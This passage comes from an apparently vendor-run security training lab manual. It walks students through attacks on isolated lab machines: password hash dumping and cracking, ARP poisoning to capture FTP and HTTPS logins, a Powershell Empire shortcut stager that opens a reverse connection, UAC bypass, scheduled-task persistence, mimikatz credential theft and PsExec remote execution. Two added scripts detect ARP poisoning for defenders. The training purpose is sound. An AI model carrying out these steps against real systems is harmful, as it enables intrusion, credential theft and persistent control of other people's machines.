4. Type in the following commands to create 7 accounts with different passwords:

net user test1 Trend /add
net user test2 TREND /add
net user test3 _Trend__Trend_ /add
net user test4 _Trend__Trend_ABCDEFGH /add
net user test5 ACE202 /add
net user test6 @Trend /add
net user test7 Trend. /add

You will receive a warning for user test4, as the password exceeds 14 characters. Press
<Y> to create the user.
5. Dump the hashes of all user accounts into a text file named hashes.txt:

gsecdump-v2b5.exe -s | findstr /C:"test" > hashes.txt

6. Switch to the Attacker machine.


7. Open an elevated command prompt if it is no longer open.
8. Navigate to the “samdump2” folder:

cd \tools\samdump2

9. On the command prompt, type in the following commands to create 3 accounts with different
passwords:

net user test1 12345678 /add
net user test2 trend /add
net user test3 ACE202 /add

10. Dump the hashes of all user accounts into a text file named hashes.txt:

samdump2.exe -l | findstr /C:"test" > hashes.txt


> Rainbow Tables: ophcrack


1. Switch to the Server machine.
2. Open Windows Explorer and navigate to “C:\Tools”.
3. Double-click on ophcrack-win32-installer-3.6.0.exe. This will start the installation of
ophcrack.
4. On the Welcome screen, click on “Next”.
5. Within the Select components to install section, make sure to uncheck "Download and
Install small WinXP tables (380MB)":

OPHCRACK: SELECT COMPONENTS TO INSTALL

6. Leave all other options as per default and click “Next” three times to start the installation.
The installation process begins. This may take a few minutes to complete.
7. Click “Next” when the installation is complete, followed by “Finish” to close the Setup Wizard.
8. Double-click the ophcrack shortcut on the desktop.
9. Click “Load” from the menu and select PWDUMP file.
10. In the Open PWDUMP File pop up, select C:\Tools\hashes.txt and click “Open”:

OPHCRACK: SELECT PWDUMP FILE

11. Click the “Tables” icon on the menu.


12. In the Tables pop up, click on the Install button. The "Browse For Folder" window will appear.
13. Select the folder C:\Tools\tables_xp_free_fast and click “OK”.
14. Click “OK” again to go back to the main window. The table XP free fast should be listed in
the bottom panel:

OPHCRACK: REGISTRATION OF XP FREE FAST TABLE

Note that ophcrack splits and displays the LM password in 2 different columns, “LM Pwd 1”
and “LM Pwd 2”.
15. Click on the “Crack” button to start retrieving the passwords from the hashes.
16. Click on the plus + sign next to XP free fast on the table list.
This will provide the progress for the current password retrieval.
You will notice that the LM PWD 1, LM PWD 2, and NT Pwd columns are slowly being
populated with the passwords you have provided at the start of the exercise.
Certain user accounts’ passwords will be shown as "not found" for different reasons:

User Account   Password                 Reason
Test3          _Trend__Trend_           Rainbow table does not cover the _ character
Test4          _Trend__Trend_ABCDEFGH   Exceeds the 14-character limit
Test6          @Trend                   Rainbow table does not cover the @ character
Test7          Trend.                   Rainbow table does not cover the . character
OPHCRACK: ACCOUNTS WITH PASSWORDS “NOT FOUND”


> Brute Force: John-the-Ripper


1. Switch to the Attacker machine.
2. Open an elevated command prompt, in case it is no longer open.
3. Navigate to the “C:\tools\john179j5\run” folder:

cd \tools\john179j5\run

4. Use the John the Ripper tool to crack the password from the hashes using the brute force
technique:

john --format=nt c:\tools\samdump2\hashes.txt

Note: Refer to Appendix B.6 on page 115 for further information on john parameters.

5. This process may take some time to complete because of the complexity of one of the
passwords we have set. Within just a few seconds however, we should see the results for the
first two passwords.
Pressing any key will list the current password that John the Ripper is trying to crack.

JOHN-THE-RIPPER: BRUTE FORCE

6. Once the tool has finished with the first two hashes, abort the process by pressing
<CTRL>+<C>.
7. Three new files, namely john.pot, john.rec and john.log, have been created. View the contents
of the john.pot file for the list of the passwords acquired through brute force:

type john.pot

8. The file contains successfully cracked passwords with their respective NTLM hashes:

JOHN-THE-RIPPER: JOHN.POT STORES SUCCESSFULLY CRACKED PASSWORDS


Exercise 7: ARP Poisoning to sniff FTP traffic


In this exercise, we will be using ARP Spoofing to intercept data packets intended for other
computers. In the process, we will be capturing clear-text passwords sent via FTP within the
compromised network.

> Installation of Cain & Abel


1. On the Attacker machine, use Windows Explorer to navigate to “C:\Tools”.
2. Double-click ca_setup.exe.
When the User Account Control dialogue box appears, click on “Yes”.
3. As we will be using the default installation settings for Cain & Abel, simply click “Next” on
each page of the installer.
4. Click “Finish”.
5. Once Cain & Abel is installed, you will be prompted to install WinPcap. Click “Install”:

CAIN & ABEL INSTALLATION: WINPCAP

We do not need to change any settings for WinPcap, therefore install it with all default
options.
6. Ensure to leave Automatically start the WinPcap driver at boot time selected and click
“Install”:

CAIN & ABEL INSTALLATION: SETUP WINPCAP DRIVER AT BOOT

7. Click on “Finish” to close the setup wizard.


> Confirm ARP Cache before Poisoning


1. Switch to the Victim machine.
2. Open the Control Panel and select Windows Firewall.
3. Ensure Domain networks is listed as “Connected” and Windows Firewall state is "On."
If it is not the case, check if the Server machine is running and restart the Victim machine.

ARP CACHE: DOMAIN NETWORK “CONNECTED”

4. Open a command prompt and run the following command to query the ARP cache:

arp -a

5. This will list all cached MAC-to-IP address mappings.


Since this is the first time we have opened up the Victim machine, there will be no ARP
entries for the Attacker machine (192.168.100.111) yet:

ARP CACHE: ATTACKER NOT LISTED YET

6. In the command prompt, ping the Attacker machine:

ping 192.168.100.111

7. Re-run the command to display the ARP cache:

arp -a


8. The MAC addresses of all machines, Attacker (192.168.100.111), Server (192.168.100.131) and
Ubuntu (192.168.100.151), are now in the list, marked as “dynamic”:

ARP CACHE: ATTACKER IS LISTED ONCE PINGED

Take also note that the MAC address of each machine is unique.

> ARP Poisoning with Cain & Abel


1. Switch to the Attacker machine.
2. Double-click the Cain shortcut on the Desktop.
In case you receive a warning regarding the Windows Firewall, ensure you have disabled the
firewall before proceeding. See: Exercise 7.2.
3. Click on the Start/Stop Sniffer icon (the 2nd from the left) to enable the Sniffer.

ARP POISONING: CAIN & ABEL ENABLE SNIFFER

4. Click on the Sniffer tab.

ARP POISONING: SNIFFER TAB

5. In case the list already contains entries from a previous install, right-click an entry and select
Remove All.
6. Right-click on an empty space on the table and select Scan MAC Address:

ARP POISONING: SCANNING MAC ADDRESSES


7. In the Mac Address Scanner pop up, ensure to select All hosts in my subnet:

ARP POISONING: SCANNING ALL HOSTS

8. Click “OK” to begin the scan.


9. Once finished, you will see the IP and MAC addresses of the Server, the Victim and the
Ubuntu machines listed:

ARP POISONING: SCAN RESULTS

10. Write down in the table below the MAC address corresponding to each IP address after
the tool has scanned for MAC addresses:

IP Address        MAC Address
192.168.100.121   005056014F61
192.168.100.131   005056014F63
192.168.100.151   0050560156B9
MAC AND IP ADDRESS MAPPING

11. Click on the APR tab at the bottom to configure ARP poisoning routing.

ARP POISONING: APR TAB


12. Click on an empty slot on the table at the top to enable the Add to List button:

ARP POISONING: ADD TO LIST

13. Click on the Add to List icon.


14. Within the pop up, select the IP address of the Victim machine, 192.168.100.121, on the left
panel. Any remaining IP addresses will automatically be listed on the table on the right:

ARP POISONING: SELECTING THE TARGETS

15. Select the IP address of the Server, 192.168.100.131, on the right panel and click “OK”.

Note: It does not matter which machine is selected first on the left. ARP poisoning will cause
both targets to update their ARP cache entry for the opposite side with the MAC address of the
Attacker.

16. A new entry will be listed in the main window of Cain, showing the status “Idle”:

ARP POISONING: TARGETS LISTED


17. Click on the Start/Stop APR icon to begin ARP Poisoning:

ARP POISONING: START POISONING

You will notice that the status of the selected targets in the list changes from “Idle” to
“Poisoning”.
18. Switch back to the Victim machine.
19. Using a command prompt, check the ARP cache again:

arp -a

The ARP cache now shows the Server machine, 192.168.100.131, having the same MAC
address as the Attacker machine.
20. Connect to the FTP server hosted at the Server machine using the command:

ftp 192.168.100.131

21. Login with the credentials FtpUser with password FtpPass.


22. End the FTP session with the command:

quit

23. Switch back to the Attacker machine.


24. Click on the Passwords tab at the bottom of Cain & Abel's console window:

ARP POISONING: PASSWORDS TAB


25. Select Passwords > FTP on the left panel:

ARP POISONING: DISPLAYING PASSWORDS

Notice that FTP has a value of (1). This means the Cain program was able to sniff one (1)
password sent using the FTP protocol.
26. Switch to the Server machine.
27. Using a command prompt, ping the Attacker machine:

ping 192.168.100.111

28. Check the ARP cache using the command:

arp -a

The output should show that the Victim, 192.168.100.121, is cached with the same MAC
address as the Attacker on 192.168.100.111.
29. Stop ARP Poisoning and the Network Sniffer using their respective icons:

ARP POISONING: STOPPING ACTIVITIES

Note: ARP Poisoning works only on local networks within the same subnet. Therefore, Cain &
Abel will not be useful when trying to perform the above activity between routed networks.
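
The two observations made on the Victim and the Server in steps 19 and 28 (a host's cached MAC address suddenly equals the Attacker's, and one MAC address answers for two IP addresses) are exactly what a defender looks for when checking hosts for ARP cache poisoning. The following Python script is an added example and is not part of the workshop manual or of Cain & Abel: it parses snapshots in the format of the Windows arp -a command, reports MAC addresses shared by several IP addresses, and reports dynamic entries whose MAC changed since a baseline snapshot. Both snapshots are constructed; the Server and Ubuntu MAC addresses are those from the table in step 10, while the Attacker MAC 00-50-56-01-4f-62 is a made-up placeholder.

```python
"""Spot ARP-cache poisoning from 'arp -a' snapshots, as in steps 19 and 28 above.

Added example; not part of the workshop manual or of Cain & Abel. Two tell-tale
signs are checked: (1) two IP addresses sharing one MAC address inside a snapshot,
and (2) a dynamic entry whose MAC changed between a baseline and a later snapshot.
"""
import re
from collections import defaultdict

# Matches the data rows of Windows 'arp -a' output, e.g.
#   192.168.100.131       00-50-56-01-4f-63     dynamic
ARP_ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\s+(\w+)",
    re.IGNORECASE,
)


def normalize_mac(mac: str) -> str:
    """'00-50-56-01-4F-63' -> '005056014f63' (the notation used in the manual's table)."""
    return mac.replace("-", "").replace(":", "").lower()


def parse_arp(output: str) -> dict:
    """Return {ip: mac} for dynamic rows only; static broadcast/multicast rows are ignored."""
    table = {}
    for line in output.splitlines():
        m = ARP_ROW.match(line)
        if m and m.group(3).lower() == "dynamic":
            table[m.group(1)] = normalize_mac(m.group(2))
    return table


def shared_macs(table: dict) -> dict:
    """{mac: [ip, ...]} for every MAC that answers for more than one IP address."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def changed_entries(baseline: dict, current: dict) -> list:
    """[(ip, old_mac, new_mac)] for hosts whose cached MAC differs from the baseline."""
    return [(ip, baseline[ip], mac) for ip, mac in sorted(current.items())
            if ip in baseline and baseline[ip] != mac]


def detect_poisoning(before: str, after: str) -> dict:
    """Run both checks on a baseline snapshot and a later one."""
    base, cur = parse_arp(before), parse_arp(after)
    return {"shared": shared_macs(cur), "changed": changed_entries(base, cur)}


# Constructed snapshots in Windows 'arp -a' format, taken on the Victim (192.168.100.121).
# Server and Ubuntu MACs are the ones listed in the manual's table; the Attacker MAC
# 00-50-56-01-4f-62 is a made-up placeholder.
BEFORE = """\
Interface: 192.168.100.121 --- 0xb
  Internet Address      Physical Address      Type
  192.168.100.111       00-50-56-01-4f-62     dynamic
  192.168.100.131       00-50-56-01-4f-63     dynamic
  192.168.100.151       00-50-56-01-56-b9     dynamic
  192.168.100.255       ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# After poisoning, the Server's entry carries the Attacker's MAC (what step 19 observes).
AFTER = BEFORE.replace("192.168.100.131       00-50-56-01-4f-63",
                       "192.168.100.131       00-50-56-01-4f-62")

if __name__ == "__main__":
    result = detect_poisoning(BEFORE, AFTER)
    for mac, ips in result["shared"].items():
        print(f"MAC {mac} claims {len(ips)} addresses: {', '.join(ips)}")
    for ip, old, new in result["changed"]:
        print(f"{ip}: cached MAC changed {old} -> {new}")
```

The baseline snapshot produces no findings; the poisoned snapshot reports the Attacker's MAC as claiming both 192.168.100.111 and 192.168.100.131, and the Server entry as having changed. Only dynamic entries are considered because broadcast and multicast rows legitimately share addresses; a gateway whose MAC changes after a hardware swap is the usual benign explanation for a single changed entry, so the shared-MAC check is the stronger signal.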


Exercise 8: Fileless Backdoor with Powershell Empire


Fileless attacks are one of the tools of choice for hackers because they can infect systems
without leaving traces on disk. In this exercise, we will use modules of “Powershell Empire” to
inject malicious code directly into memory without touching the hard disk.
1. Open the console window of the Ubuntu machine and log in using user ubuntu (default
password: novirus=123).
2. Open a terminal via right-click on Desktop > Open terminal.
3. Run the following 2 commands to start Powershell Empire:

cd empire
sudo ./empire

Enter the password for user ubuntu again, when prompted.

Note: Refer to Appendix B.7 on page 116 for an overview of Powershell Empire commands.

4. Once started, Powershell Empire will show the following screen:

POWERSHELL EMPIRE: START SCREEN

Before Powershell Empire can be used for exploitation and further infiltration of a target
machine, Listeners need to be created. Listeners in Powershell Empire are the channels which
receive connections from our target machine.
5. Type the following command to navigate into the listener option:

listeners

It is normal to have a result of “No listeners currently active” on the list when you enter this
command for the first time.
6. To view options under listeners, type:

help

7. Start a listener module for http in Powershell Empire using the command:

uselistener http


8. To view the list of options for the http listener, type:

help

9. Use the following command to show information and required parameters for the particular type
of listener:

info

Fields under “Required” that are set to “True” should be filled with appropriate values. In this
case, all are set accordingly.
10. Start the listener using the command:

(Empire: listeners/http) > execute

11. This will start the http listener:

POWERSHELL EMPIRE: STARTING LISTENER

12. To see the list of active listeners, use the command:

(Empire: listeners/http) > listeners

13. To list all available stagers, type the following command, followed by <Space>, <Tab>, <Tab>:

(Empire: listeners) > usestager <Space>, <Tab>, <Tab>

Stagers in Powershell Empire are used to set the stage for the post-exploitation activities. They
are similar to payloads, which are used to create a connection back to Empire.
14. This will display a list of available stagers:

POWERSHELL EMPIRE: LIST OF AVAILABLE STAGERS

Powershell Empire can create loaders with different file types like “.vbs”, “.bat” etc. In this
exercise, we will use a “.lnk” file as a loader (stager).
15. To use a link file (shortcut) as a stager, type the following command:

(Empire: listeners) > usestager windows/launcher_lnk


16. Similar to the command uselistener, we can get more information and parameters about this
particular stager by running the command:

(Empire: stager/windows/launcher_lnk) > info

We can see that Listener is a required parameter, but has no value set yet. We will need to supply
the value in order to use the stager.
17. Set the Listener parameter of the stager to http:

(Empire: stager/windows/launcher_lnk) > set Listener http

18. As we’re creating a shortcut file, we also need to set the location of the stager output file. To
specify the location, type in the following command:

(Empire: stager/windows/launcher_lnk) > set OutFile /home/ubuntu/winshare/clickme.lnk

19. This completes the configuration of the stager. To execute the stager, run the command:

(Empire: stager/windows/launcher_lnk) > execute

20. The output will indicate, that the lnk file has been successfully created:

POWERSHELL EMPIRE: STAGER FILE EXPORTED

21. Type the following command to prepare execution of another stager:

(Empire: stager/windows/launcher_lnk) > back

22. Switch to the Victim machine.


23. Using Windows Explorer or the Run dialog, navigate to:

\\192.168.100.151\winshare

This will open a SMB share located on the Ubuntu machine, where we saved the “.lnk” stager file.
24. Copy the clickme.lnk to the desktop.
25. To analyze the content of the shortcut file, open Notepad.
26. In Notepad, open the file clickme.lnk from the Desktop.
Ensure to select Format > Word Wrap to see all contents.
27. We can identify that this is indeed a script written in Powershell, even though the content of
the script is base64-encoded and not readable:

POWERSHELL EMPIRE: CONTENTS OF LNK FILE


28. Close Notepad.


29. Double-click clickme.lnk on the Desktop.
This will execute the Powershell script within the “.lnk” file. This will create a reverse connection
back to the Ubuntu machine.
30. Switch back to the Ubuntu virtual machine.
31. As the stager has connected back to the Ubuntu machine after the double-click on the “.lnk” file,
a new agent is created:

POWERSHELL EMPIRE: AGENT CREATED

32. Press <Enter> in the Powershell Empire console.


33. Run the following command:

(Empire: stager/windows/launcher_lnk) > agents

34. This will list all active agents:

POWERSHELL EMPIRE: LIST ALL ACTIVE AGENTS

The agent will report back with a random name. To identify easily what agent is being used in
case of multiple connections, it is recommended to rename the agent.
35. Type the following command to rename the agent:

rename 94MDPWE8 Victim1

Note: Replace 94MDPWE8 with your own agent name as identified in step 34.

36. To identify whether the rename was successful, run this command again:

(Empire:agents) > agents


POWERSHELL EMPIRE: AGENT SUCCESSFULLY RENAMED

37. To interact or use the agent called “Victim1”, use the following command:

(Empire:agents) > interact Victim1

38. Similar to previous modules, the following command allows to see a list of all available
commands:

(Empire:Victim1) > help

39. To use the command prompt on the target machine to display its hostname, type the command:

(Empire:Victim1) > shell hostname

40. Notice that we see PC-Victim as a result of hostname command:

POWERSHELL EMPIRE: EXECUTING REMOTE SHELL COMMANDS

This shows that the command was executed on the remote machine rather than locally.
41. Press <Enter>.
42. To view system information of the target, run the command:

(Empire:Victim1) > sysinfo

43. The output will list some information about the target, such as the user currently running the
process, the operating system, the IP address etc.:

POWERSHELL EMPIRE: SYSINFO COMMAND


In this activity, we used a “.lnk” file and not a Portable Executable file as a loader for our
backdoor, which will be later used for lateral movement.
44. Leave the Powershell Empire console open in preparation for the next activity.


Exercise 9: Privilege Escalation


Privilege escalation is the practice of leveraging system vulnerabilities to escalate privileges to
achieve greater access than administrators or developers originally intended.

Note: Before performing this exercise, ensure you have properly configured the backdoor and
reverse connection in Exercise 8.

1. If not there already, open the console window of the Ubuntu machine.
The Powershell Empire terminal should still be open, with an active agent running.
2. In the Powershell Empire terminal, modules can be accessed using the command usemodule. To
list all available modules, type the following command, followed by <Space>, <Tab> and <Tab>:

usemodule

Modules in Powershell Empire are used to perform specific tasks, such as bypassing UAC,
creating persistence, dumping password hashes etc.
3. First, we want to use a module capable of checking for any Windows privilege escalation vectors.
Run the following command:

usemodule privesc/powerup/allchecks

4. More information and parameters about this particular module can be obtained, similar to
listeners and stagers, with the command:

info

5. Powershell Empire will display the following information:

PRIVILEGE ESCALATION: ALLCHECKS MODULE INFO

This module runs all current checks for Windows privilege escalation vectors. It has only
one required field, Agent, which is already set up accordingly.


6. To apply the module on the agent, type the following command:

execute

This command will take a few moments.


7. Once the command is executed, the following information will be displayed:

PRIVILEGE ESCALATION: EXECUTE ALLCHECKS MODULE

As you can see at the top of the output, the module detected that the local group has
administrative privileges and advises running a “BypassUAC” attack in order to elevate privileges.
8. Press <Enter>, followed by the command:

back

9. To run a “BypassUAC” attack, run the following command:

usemodule privesc/bypassuac

10. Type the following command to gain more insight about this specific module:

info

11. Any parameter, with the property Required set to “True” must be supplied. On this module,
Listener and Agent are the parameters required, whereas Listener has no value set yet:

PRIVILEGE ESCALATION: BYPASSUAC MODULE PARAMETERS

12. To set a value for the Listener parameter, run the following command:

set Listener http

This will set the Listener to http, which we have already set up during Exercise 8.


13. Confirm the setting of the parameter with the command:

info

14. As all required parameters are set, execute the module:

execute

15. When requested, press <Y>, followed by <Enter> to run the task on the remote machine:

PRIVILEGE ESCALATION: EXECUTE BYPASSUAC MODULE

Once the module “BypassUAC” has executed successfully, the target machine will use a new
agent for the elevated connection.
16. To identify the new agent, press <ENTER>, followed by the two commands:

back
agents

17. The list of agents should now contain 2 connections. Notice the * in front of the username for the
new agent:

PRIVILEGE ESCALATION: BYPASSUAC SUCCESSFUL

The asterisk (*) indicates that the new agent has successfully performed “BypassUAC”
and elevated from a medium integrity process to a high integrity process. See below the different
integrity values:

Integrity Level   Assigned Access Rights
High              Full Administrator Rights
Medium            Standard User Rights
Low               Highly Restricted
PRIVILEGE ESCALATION: PROCESS INTEGRITY LEVEL


18. To easily identify the name of the agent, rename the latest added agent to Victim1A:

rename TMZ14E6Y Victim1A

Note: Replace TMZ14E6Y with your own agent name as identified in step 17.

19. To interact with the new agent, run the command:

interact Victim1A

20. This will establish a connection with Victim1A:

PRIVILEGE ESCALATION: ESTABLISH CONNECTION WITH ESCALATED ADMIN RIGHTS

We have now established communication with the Victim with full administrative privileges. In
order to keep those rights, we require persistence that survives a reboot of the target
machine. For this exercise, we will use the “schtasks” module, which maintains persistence of a
stager using the Windows task scheduler, running as the SYSTEM account.
21. Select the schtasks module by typing the following command:

usemodule persistence/elevated/schtasks*

22. List all required parameters of the module using the command:

info

23. This will list all required and optional parameters:

PRIVILEGE ESCALATION: SCHTASKS MODULE PARAMETERS


24. Even though they are optional parameters only, we will change the settings for Listener and
OnLogon:

set Listener http
set OnLogon true

OnLogon sets the trigger of the scheduled task to “user logon”: as soon as a user logs in to the
remote machine, the task is executed.
Listener is not required for this module; however, we configure it to ensure that after a reboot
the target reconnects to the Attacker machine.
Also note down the value of TaskName, as we can use it later during the exercise to correctly
identify the created task.
25. To start the schtasks module, run the command:

execute

26. Once asked, press <Y> and <Enter> to run the module:

PRIVILEGE ESCALATION: EXECUTE SCHTASKS MODULE

27. Once executed, press <Enter> again and type the back command twice:

PRIVILEGE ESCALATION: BACK OUT FROM MODULE INTO AGENTS SELECTION

28. Switch to Victim machine.


29. Click on Start and type Task Scheduler.
30. Open the Task Scheduler and navigate to Task Scheduler Library:

PRIVILEGE ESCALATION: WINDOWS 7 TASK SCHEDULER LIBRARY


31. Double-click the task Updater.


This is the name specified in the parameters of the schtasks module in Step 24.
32. In the Updater Properties window, select the tab “Actions”:

PRIVILEGE ESCALATION: “UPDATER” TASK PROPERTIES

33. Select the action Start a program from the list and click “Edit”.
34. The Program/script parameter is powershell.exe itself, while the Add arguments (optional)
item shows the code generated by the schtasks module.
35. To test the privilege escalation and the persistence, reboot the Victim machine.
36. Once rebooted, login to the Victim machine.
37. Switch back to the Ubuntu machine.
38. As a result of the Updater scheduled task, there will be a new agent created. In Powershell
Empire, press <Enter>.
39. Type the following command to list all available agents:

list

40. The first two agents are marked in red, which means the agents are inactive:

PRIVILEGE ESCALATION: INACTIVE AGENT SESSIONS

Also take note of the new agent’s username. This agent is now running as SYSTEM instead of
Victim, which means any restrictions on the Victim machine are successfully bypassed.


41. Rename the new agent to Victim1B and interact with it:

rename M7YF4TXW Victim1B
interact Victim1B

Note: Replace M7YF4TXW with your own agent name as identified in step 40.

42. Use the remote command prompt command to see the information about the agent:

shell hostname

43. This should give you the output PC-Victim:

PRIVILEGE ESCALATION: REMOTE SHELL COMMAND HOSTNAME

44. Run the command:

shell whoami

45. You will notice that the process is now running under SYSTEM:

PRIVILEGE ESCALATION: REMOTE SHELL COMMAND WHOAMI

46. Press <Enter>.


As we’re now running the agent with elevated privileges, we can dump all credentials on the
system.
47. The following command uses the module powerdump, which will dump out the local hashes on
the Victim machine:

usemodule credentials/powerdump*

48. There are no parameters required, so we can run the module without modification:

execute


49. As a result, this module returns the hash dumps of the local users on this machine:

PRIVILEGE ESCALATION: POWERDUMP MODULE OUTPUT

As with the other hash dump tools used in previous exercises, each user credential line is
composed of [Username:UserID:LM Hash:NTLM Hash].
50. Press <Enter> and type the command:

back

51. To access credential dumps from Active Directory, we will use the module mimikatz, which has a
function called “logonpasswords”. Use the following command to use and execute the module:

usemodule credentials/mimikatz/logonpasswords*
execute

52. The output reveals user accounts, both local and from AD, recovered from memory:

PRIVILEGE ESCALATION: REVEAL USER ACCOUNT CREDENTIALS FROM MEMORY USING MIMIKATZ


Exercise 10: ARP Poisoning to sniff HTTP(s) traffic


In this exercise, we will be using ARP Spoofing to intercept data packets intended for other
computers. In the process, we will be capturing passwords that are sent through the HTTP and HTTPS
protocols.
1. Switch to the Victim machine.
2. Open Internet Explorer and navigate to http://server/ACE202.
3. Login using the credentials of the Victim user account.
A web page with the Trend Micro logo appears:

ARP POISONING: VALID HTTP WEBSITE

4. Open another tab in Internet Explorer and navigate to https://server/ACE202.


Login again using the credentials of the Victim user account. The web page with the Trend Micro
logo appears again, this time secured.
5. On the address bar, click on the padlock icon near the URL to view the security details of the
current website:

ARP POISONING: PADLOCK ON HTTPS WEBSITES

6. Click on View certificates.


This will display the certificate issued by the server.


7. Click on the Certification Path tab:

ARP POISONING: CERTIFICATE DETAILS

This shows that the server certificate has been signed by the CA "ACE202-CA."
8. Click on “OK” and close Internet Explorer.
9. Switch to the Attacker machine and open Cain & Abel, if it's not already open.
10. Click on the Start/Stop Sniffer icon to start packet sniffing.
11. Click on the Start/Stop APR icon to start ARP poisoning routing.
The status in the APR tab should change from “Idle” to “Poisoning”.
12. Switch to the Victim machine.
13. Open the Control Panel and navigate to Network and Internet > Internet Options.
14. On the Internet Options pop up, click “Delete...” in the section Browsing history.
15. Place a check on all boxes and click “Delete”:

ARP POISONING: DELETE BROWSING HISTORY

16. Close all Internet Options windows.


17. Open Internet Explorer and navigate to http://server/ACE202.
Login using the credentials of the Victim user account. The web page with the Trend Micro logo
appears.
18. Switch to the Attacker machine.
19. Click on the Passwords tab in Cain & Abel.


20. Navigate to Passwords > HTTP on the left panel. Notice that HTTP has a value of (4). This means
Cain & Abel was able to sniff four (4) passwords via HTTP:

ARP POISONING: HTTP PASSWORDS SUCCESSFULLY INTERCEPTED

21. Select and remove all of the passwords listed.


22. Switch to the Victim machine.
23. On Internet Explorer, open another tab and navigate to https://server/ACE202.
Login using the credentials of the Victim user account; this will again show the web page with the
Trend Micro logo.
24. Switch to the Attacker machine.
25. The passwords tab remains empty since no passwords were intercepted, as the HTTPS protocol
was used.
26. Click on the APR tab at the bottom and click on ARP-Cert which has a value of (1) next to it.
Cain generates a self-signed certificate to spoof the certificate provided by the server. Take note
of the location of the certificate. By default, it is saved in the “Certs” folder of the Cain & Abel
program directory.
27. Open Windows Explorer and navigate to “C:\Program Files (x86)\Cain\Certs”.
28. Right-click on self-signed_192.168.100.131.crt and click on Properties.
29. In the Certificate properties window, select the “Details” tab and verify that the certificate was
recently created by the Attacker machine:

ARP POISONING: SPOOFED WEBSITE CERTIFICATE


30. Click “OK” and close Windows Explorer.


31. Switch to the Victim machine.
32. Refresh https://server/ACE202.
33. Internet Explorer now displays a warning, advising that "There is a problem with this website's
security certificate":

ARP POISONING: CERTIFICATE ERRORS

This warning is normal behavior for self-signed and expired certificates. In this case, however,
it is caused by the spoofed certificate.
34. Click on Continue to this website (not recommended).
35. On the address bar, click on Certificate error next to the URL:

ARP POISONING: CERTIFICATE DETAILS

36. Click on View certificates. The certificate window appears.


37. Click on the Certification Path tab.


You will notice that the certificate is no longer the same as before and is now untrusted. The
screenshot below shows the comparison between the new, spoofed certificate on the left and the
valid one on the right:

ARP POISONING: CERTIFICATION PATH

38. Switch to the Attacker machine.


39. Click on the Passwords tab at the bottom of Cain & Abel.
40. Click on HTTP and check the password intercepted from the HTTPS packet.

ARP POISONING: HTTPS PASSWORD SUCCESSFULLY INTERCEPTED

41. Stop ARP Poisoning and the Network Sniffer using their respective icons:

ARP POISONING: STOPPING ACTIVITIES
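As an added defender-side example (not part of the workshop material), the following Python script parses a Windows arp -a table and flags the two symptoms the poisoning above produces on the Victim: one MAC address answering for several IPs, and a critical host whose MAC no longer matches a recorded baseline. The ARP table and the baseline MAC addresses are constructed values.

```python
"""Detect ARP cache poisoning indicators in a Windows `arp -a` dump.

Added example for the ARP poisoning exercise; not part of the original
workshop material. The ARP table and the baseline MACs are constructed
(hypothetical) values; a defender records the baseline on a clean segment.
"""
import re
from collections import defaultdict

# Constructed `arp -a` output as seen on the Victim while Cain is poisoning:
# the Server (192.168.100.131) and the Attacker (192.168.100.111) now both
# resolve to the same MAC address.
ARP_A_OUTPUT = """\
Interface: 192.168.100.121 --- 0xb
  Internet Address      Physical Address      Type
  192.168.100.1         00-50-56-aa-00-01     dynamic
  192.168.100.111       00-0c-29-11-22-33     dynamic
  192.168.100.131       00-0c-29-11-22-33     dynamic
  192.168.100.255       ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Assumed baseline (hypothetical values): MACs recorded for critical hosts
# when the segment was known to be clean.
BASELINE = {
    "192.168.100.1": "00-50-56-aa-00-01",    # gateway
    "192.168.100.131": "00-0c-29-44-55-66",  # Server's real MAC
}

ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(dynamic|static)\s*$",
    re.IGNORECASE,
)


def parse_arp_table(text):
    """Return (ip, mac, type) tuples; header and interface lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m.group(1), m.group(2).lower(), m.group(3).lower()))
    return entries


def find_spoofing_indicators(entries, baseline):
    """Flag two classic ARP poisoning symptoms and return sorted findings.

    1. One MAC address claiming several IPs: the poisoner answers for every
       host whose traffic it wants to intercept.
    2. A critical host whose cached MAC differs from the recorded baseline.
    """
    findings = []
    ips_by_mac = defaultdict(list)
    for ip, mac, kind in entries:
        # Static entries are broadcast/multicast and legitimately share MACs.
        if kind == "dynamic":
            ips_by_mac[mac].append(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            findings.append("MAC %s claims multiple IPs: %s" % (mac, ", ".join(sorted(ips))))
    current = {ip: mac for ip, mac, _ in entries}
    for ip, expected in baseline.items():
        seen = current.get(ip)
        if seen is not None and seen != expected.lower():
            findings.append("%s baseline MAC %s but ARP cache has %s" % (ip, expected.lower(), seen))
    return sorted(findings)


if __name__ == "__main__":
    for finding in find_spoofing_indicators(parse_arp_table(ARP_A_OUTPUT), BASELINE):
        print("ALERT:", finding)
```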


Exercise 11: Remote Execution with PsExec


In this exercise, we will be using PsExec to list directory contents, check network settings, and run
programs on a remote computer.
1. Access the Attacker machine.
2. Open an elevated command prompt and navigate to the “Tools” folder:

cd \tools

3. Run the following command to confirm the local IP address:

ipconfig

This confirms that the local IP address is 192.168.100.111.


4. Run the same command remotely on the Victim machine using PsExec:

PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 ipconfig

If this is the first time the PsExec program is executed, an end-user license agreement from
Sysinternals will appear. Click “Agree” to continue.

Note: Refer to Appendix B.8 on page 116 for command parameters of PsExec.

5. The command prompt displays the results for the Victim machine as indicated by the IP address,
192.168.100.121:

PSEXEC: RUN IPCONFIG REMOTELY

6. Using PsExec.exe, view the contents of the root directory of the Victim machine using the
command:

PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 cmd /c dir c:\*.* /a


7. This will display the content of the Victim’s C: drive:

PSEXEC: REMOTELY LIST DIRECTORIES

8. PsExec is able to copy required executables to the target prior to execution. Run the following
command:

PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 -h -c Attack.exe

